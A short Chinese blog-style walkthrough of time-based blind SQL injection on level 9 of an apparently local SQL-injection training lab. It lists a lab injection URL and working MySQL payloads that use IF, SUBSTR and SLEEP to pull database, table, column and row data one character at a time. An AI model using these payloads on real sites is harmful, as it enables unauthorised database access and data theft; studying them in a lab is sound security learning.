Sql Inject Less 9 盲注基于休眠时间
因为基于休眠时间受限于网络带宽,时间,延迟等因素。所以返回的数据相当地不准确,需要根据返回地数据进行英文单词参照,慢,延迟高,还不准确。
如果发现了这类型地漏洞,那简直是噩梦。
注入地址,例:http://192.168.230.130/trainer/Less-9/?id=2' and sleep(10) --+
查询数据库payload为:'and if(SUBSTR(DATABASE(),1,1)='s', sleep(5), null) --+
查询表的payload为:' and if(SUBSTR((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e', sleep(5), null) --+
查询表字段的payload为:' and if(SUBSTR((select column_name from information_schema.COLUMNS where table_name='emails' limit 0,1),1,1)='i', sleep(5), null) --+
查询表数据的payload为:' and if(SUBSTR((select id from security.emails limit 0,1),1,1)='1', sleep(5), null) --+
测试SQL:
select SYSDATE() from dual where 1=1 and if(SUBSTR((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e', sleep(5), null)
select SYSDATE() from dual where 1=1 and if(SUBSTR((select column_name from information_schema.COLUMNS where table_name='emails' limit 0,1),1,1)='i', sleep(5), null)
select SYSDATE() from dual where 1=1 and if(SUBSTR((select id from security.emails limit 0,1),1,1)='1', sleep(5), null)
评论
发表评论